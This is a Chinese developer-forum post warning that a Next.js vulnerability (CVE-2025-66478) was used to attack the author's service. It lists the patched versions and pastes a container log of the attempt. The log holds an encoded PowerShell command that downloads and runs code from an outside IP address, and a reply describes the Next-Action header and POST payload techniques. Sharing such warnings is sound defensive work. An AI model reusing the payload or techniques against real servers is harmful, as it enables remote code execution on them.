今天我们一个服务的受到攻击, 还好容器化+预警,没造成什么大的后果. 大家尽快去看一下自己 nextjs 版本是否有问题, 尽量升级修复
https://nextjs.org/blog/CVE-2025-66478
该漏洞已在以下已修复的 Next.js 版本中完全解决:
15.0.5 15.1.9 15.2.6 15.3.6 15.4.8 15.5.7 15.6.0-canary.58 16.0.7
2025-12-05T14:26:57.261834840+08:00 /bin/sh: 1: powershell: not found 2025-12-05T14:26:57.281016164+08:00 [Error: Command failed: powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA 2025-12-05T14:26:57.281027836+08:00 /bin/sh: 1: powershell: not found 2025-12-05T14:26:57.281030581+08:00 ] { 2025-12-05T14:26:57.281033386+08:00 status: 127, 2025-12-05T14:26:57.281035610+08:00 signal: null, 2025-12-05T14:26:57.281038285+08:00 output: [Array], 2025-12-05T14:26:57.281040579+08:00 pid: 54, 2025-12-05T14:26:57.281042744+08:00 stdout: <Buffer >, 2025-12-05T14:26:57.281045459+08:00 stderr: <Buffer 2f 62 69 6e 2f 73 68 3a 20 31 3a 20 70 6f 77 65 72 73 68 65 6c 6c 3a 20 6e 6f 74 20 66 6f 75 6e 64 0a>, 2025-12-05T14:26:57.281047643+08:00 digest: '1126005934' 2025-12-05T14:26:57.281049837+08:00 }  | 1 bearbest PRO dify 也使用了 nextjs 今天刚更新了漏洞修复版本 |
 | 2 shiny PRO 昨天已经受到攻击了,看到两种攻击类型,一种在 header 里添加 Next-Action: test#constructor 就会去初始化 Test 一种是执行 post 构建过来的 payload |
 | 3 simonguo OP |
Select Language